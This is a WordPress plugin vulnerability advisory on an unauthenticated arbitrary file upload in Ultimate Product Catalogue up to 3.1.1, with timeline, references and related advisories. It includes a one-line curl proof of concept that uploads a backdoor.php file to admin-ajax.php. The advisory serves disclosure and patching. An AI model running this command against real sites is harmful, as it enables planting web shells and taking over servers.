Ultimate Product Catalogue <= 3.1.1 – Unauthenticated File Upload | Plugin Vulnerabilities

Description

By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the web server process.

Proof of Concept

curl -v -k -X POST -F "Products_Spreadsheet=@./backdoor.php" "www.example.com/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet"

Affects Plugins

ultimate-product-catalogue

Fixed in 3.1.2

References

URL

https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb

Miscellaneous

Submitter

Luca Ercoli

Submitter website

http://blog.seeweb.it/

Submitter twitter

Verified

No

WPVDB ID

3a150b38-d780-49af-823f-e8b88c99d1d1

Timeline

Publicly Published

2015-04-22 (about 11 years ago)

Added

2015-04-26 (about 11 years ago)

Last Updated

2019-10-25 (about 6 years ago)

Other

Published

Title

Published

2021-03-21

Title

WooCommerce Help Scout < 2.9.1 - Unauthenticated Arbitrary File Upload leading to RCE

Published

2024-10-14

Title

Azz Anonim Posting <= 0.9 - Unauthenticated Arbitrary File Upload

Published

2024-10-21

Title

AI Postpix < 1.1.8.1 - Subscriber+ Arbitrary File Upload

Published

2026-03-12

Title

Mobile App Editor – WordPress to Android App Builder <= 1.3.1 - Authenticated (Editor+) Arbitrary File Upload

Published

2024-12-12

Title

Super Backup & Clone - Migrate for WordPress < 2.4 - Unauthenticated Arbitrary File Upload